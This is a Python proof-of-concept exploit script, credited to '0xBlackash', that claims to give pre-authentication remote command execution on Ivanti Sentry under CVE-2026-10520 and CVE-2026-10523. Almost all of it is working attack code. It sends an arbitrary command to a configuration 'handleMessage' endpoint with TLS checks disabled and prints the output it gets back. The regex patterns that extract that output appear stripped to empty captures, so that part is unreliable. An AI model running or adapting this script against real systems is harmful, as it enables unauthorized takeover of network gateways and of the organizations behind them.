#!/usr/bin/env python3 import sys import requests import re import argparse import urllib3 from urllib.parse import urljoin banner = r""" ██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗ ██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║ ██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║ ████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║ ╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ CVE-2026-10520 & CVE-2026-10523 PoC Exploit Ivanti Sentry Pre-Auth RCE + Auth Bypass Author: Ashraf Zaryouh "0xBlackash" GitHub: https://github.com/0xBlackash """ def make_command_request(base_url, command, proxies=None): """Send the command execution request.""" url = urljoin(base_url.rstrip("/") + "/", "mics/api/v2/sentry/mics-config/handleMessage") headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (compatible; 0xBlackash-Exploit/1.0)", } data = { "message": ( "execute system /configuration/system/commandexec " f"1{command}" ) } print(f"[+] Sending command to: {url}") return requests.post( url, headers=headers, data=data, timeout=15, proxies=proxies, verify=False, allow_redirects=False, ) def extract_command_output(response): """Extract command output from response.""" body = response.text try: parsed = response.json() data = parsed.get("data", body) except ValueError: data = body # Multiple fallback patterns patterns = [ r"(.*?)", r"(.*?)", r"Message handled successfully.*?(.*?)", ] for pattern in patterns: match = re.search(pattern, data, re.DOTALL | re.IGNORECASE) if match: return match.group(1).strip() return None def main(): print(banner) parser = argparse.ArgumentParser( description='CVE-2026-10520 PoC - Ivanti Sentry Pre-Auth RCE by Ashraf Zaryouh "0xBlackash"' ) parser.add_argument('--url', required=True, help='Target URL (e.g. https://target.com:8443)') parser.add_argument('--cmd', required=True, help='Command to execute (e.g. "id", "whoami", "uname -a")') parser.add_argument('--proxy', help='HTTP proxy (e.g. 127.0.0.1:8080)') parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output') args = parser.parse_args() base_url = args.url.rstrip('/') proxies = {'http': f'http://{args.proxy}', 'https': f'http://{args.proxy}'} if args.proxy else None urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) print("=" * 70) print(f"Target : {base_url}") print(f"Command: {args.cmd}") if proxies: print(f"Proxy : {args.proxy}") print("=" * 70) try: response = make_command_request(base_url, args.cmd, proxies) if args.verbose: print(f"[DEBUG] Status Code: {response.status_code}") print(f"[DEBUG] Response Length: {len(response.text)}") output = extract_command_output(response) if output: print("\n[+] Target is VULNERABLE!") print("\nCommand Output:") print("-" * 50) print(output) print("-" * 50) else: print("\n[-] Target does NOT appear to be vulnerable or command failed.") if args.verbose: print("\nRaw Response:") print(response.text[:1000]) except requests.exceptions.RequestException as e: print(f"\n[-] Request error: {e}") except Exception as e: print(f"\n[-] Unexpected error: {e}") print("\n[*] Exploit by Ashraf Zaryouh \"0xBlackash\"") if __name__ == "__main__": main()